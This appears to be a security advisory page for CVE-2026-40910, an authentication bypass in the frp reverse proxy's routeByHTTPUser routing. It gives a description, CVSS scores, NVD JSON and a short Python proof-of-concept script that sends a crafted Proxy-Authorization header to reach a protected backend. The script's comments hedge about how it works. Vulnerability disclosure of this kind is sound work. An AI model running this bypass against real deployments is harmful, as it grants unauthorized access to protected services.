Security Vulnerability Report
中文
CVE-2026-40910 CVSS 6.5 MEDIUM

CVE-2026-40910

Published: 2026-04-21 21:16:45
Last Modified: 2026-04-29 23:20:37
Source: [email protected]

Description

frp is a fast reverse proxy. From 0.43.0 to 0.68.0, frp contains an authentication bypass in the HTTP vhost routing path when routeByHTTPUser is used as part of access control. In proxy-style requests, the routing logic uses the username from Proxy-Authorization to select the routeByHTTPUser backend, while the access control check uses credentials from the regular Authorization header. As a result, an attacker who can reach the HTTP vhost entrypoint and knows or can guess the protected routeByHTTPUser value may access a backend protected by httpUser / httpPassword even with an incorrect Proxy-Authorization password. This issue affects deployments that explicitly use routeByHTTPUser. It does not affect ordinary HTTP proxies that do not use this feature. This vulnerability is fixed in 0.68.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fatedier:frp:*:*:*:*:*:*:*:* - VULNERABLE
frp 0.43.0 - 0.68.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import base64 # Exploit for CVE-2026-40910 # Description: Bypass authentication in frp when routeByHTTPUser is used. def exploit_frp_auth_bypass(target_url, target_user): """ Attempts to access a protected backend by exploiting the routing logic mismatch. """ # Construct the Proxy-Authorization header with the target user and a fake password. # The routing logic uses the username from this header to select the backend. fake_password = "incorrect_password" credentials = f"{target_user}:{fake_password}" encoded_creds = base64.b64encode(credentials.encode()).decode() headers = { "Proxy-Authorization": f"Basic {encoded_creds}", # The 'Authorization' header is used for the access control check, # but the vulnerability allows bypassing the password check in routing. # Depending on config, we might send nothing or a generic header here. } try: print(f"[*] Attempting to connect to {target_url} as user '{target_user}'...") response = requests.get(target_url, headers=headers) if response.status_code == 200: print(f"[+] Success! Accessed protected backend.") print(f"[+] Response length: {len(response.text)}") else: print(f"[-] Failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Replace with actual target and guessed username TARGET = "http://example-frp.com:8080" USERNAME = "admin" # The value of routeByHTTPUser exploit_frp_auth_bypass(TARGET, USERNAME)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40910", "sourceIdentifier": "[email protected]", "published": "2026-04-21T21:16:45.157", "lastModified": "2026-04-29T23:20:37.177", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "frp is a fast reverse proxy. From 0.43.0 to 0.68.0, frp contains an authentication bypass in the HTTP vhost routing path when routeByHTTPUser is used as part of access control. In proxy-style requests, the routing logic uses the username from Proxy-Authorization to select the routeByHTTPUser backend, while the access control check uses credentials from the regular Authorization header. As a result, an attacker who can reach the HTTP vhost entrypoint and knows or can guess the protected routeByHTTPUser value may access a backend protected by httpUser / httpPassword even with an incorrect Proxy-Authorization password. This issue affects deployments that explicitly use routeByHTTPUser. It does not affect ordinary HTTP proxies that do not use this feature. This vulnerability is fixed in 0.68.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fatedier:frp:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.43.0", "versionEndExcluding": "0.68.1", "matchCriteriaId": "2D911E2E-2DC1-4FC1-ABCE-0482EB5D8DD1"}]}]}], "references": [{"url": "https://github.com/fatedier/frp/security/advisories/GHSA-pq96-pwvg-vrr9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/fatedier/frp/security/advisories/GHSA-pq96-pwvg-vrr9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.